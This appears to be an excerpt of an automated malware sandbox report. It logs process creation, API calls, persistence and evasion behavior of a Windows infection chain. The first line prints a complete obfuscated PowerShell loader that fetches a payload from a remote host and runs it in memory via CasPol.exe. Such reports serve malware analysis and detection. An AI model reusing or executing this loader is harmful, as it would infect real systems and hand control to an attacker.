                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041D0CF
                        Source: C:\Windows\SysWOW64\wscript.exeCode function: 3_2_05CDCEFA push eax; iretd 3_2_05CDCF2D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004570CF push ecx; ret 12_2_004570E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00435226 push ecx; ret 12_2_00435239
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045D9ED push esi; ret 12_2_0045D9F6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00457A00 push eax; ret 12_2_00457A1E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002806 push ecx; ret 12_2_10002819
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00446B75 push ecx; ret 14_2_00446B85
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00452BB4 push eax; ret 14_2_00452BC1
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044DDB0 push eax; ret 14_2_0044DDC4
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044DDB0 push eax; ret 14_2_0044DDEC
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00451D34 push eax; ret 15_2_00451D41
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Temp\nonordinary.vbsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004062E2 ShellExecuteW,URLDownloadToFileW,12_2_004062E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AC43
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041D0CF
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040BAE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A941
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4780Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5016Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1444Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 8543Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-53187
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-54596
                        Source: C:\Windows\SysWOW64\recover.exeAPI coverage: 9.6 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8268Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348Thread sleep count: 1444 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348Thread sleep time: -4332000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348Thread sleep count: 8543 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348Thread sleep time: -25629000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_004090DC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B6B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041C7E5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B8BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E989 FindFirstFileExA,12_2_0044E989
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_00408CDE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419CEE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407EDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F13 FindFirstFileW,FindNextFileW,12_2_00406F13
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
